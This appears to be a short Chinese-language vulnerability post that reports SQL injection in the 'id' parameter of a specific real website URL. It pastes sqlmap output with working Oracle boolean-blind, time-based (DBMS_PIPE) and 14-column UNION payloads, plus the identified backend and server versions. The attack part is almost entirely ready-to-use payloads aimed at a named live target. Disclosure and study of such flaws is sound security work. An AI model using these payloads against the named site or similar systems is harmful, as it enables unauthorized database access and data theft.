漏洞地址:
http://www.cre.cn/jsp/fgsjj/detail_4_dd.jsp?id=914
id参数存在注入
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=914 AND 9074=9074 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: id=914 AND 2593=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(108)||CHR(122)||CHR(98),5) Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: id=914 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113)||CHR(120)||CHR(116)||CHR(119)||CHR(117)||CHR(83)||CHR(74)||CHR(69)||CHR(110)||CHR(79)||CHR(76)||CHR(79)||CHR(119)||CHR(80)||CHR(79)||CHR(72)||CHR(77)||CHR(75)||CHR(112)||CHR(114)||CHR(86)||CHR(114)||CHR(108)||CHR(104)||CHR(121)||CHR(119)||CHR(114)||CHR(82)||CHR(105)||CHR(68)||CHR(108)||CHR(73)||CHR(83)||CHR(75)||CHR(108)||CHR(76)||CHR(66)||CHR(77)||CHR(107)||CHR(118)||CHR(100)||CHR(113)||CHR(106)||CHR(122)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-----[16:07:53] [INFO] the back-end DBMS is Oracleweb application technology: Apache 2.2.22back-end DBMS: Oracle
过滤
阅读:110749 | 评论:0 | 标签:注入
姓名:
邮箱:
网址:
验证码: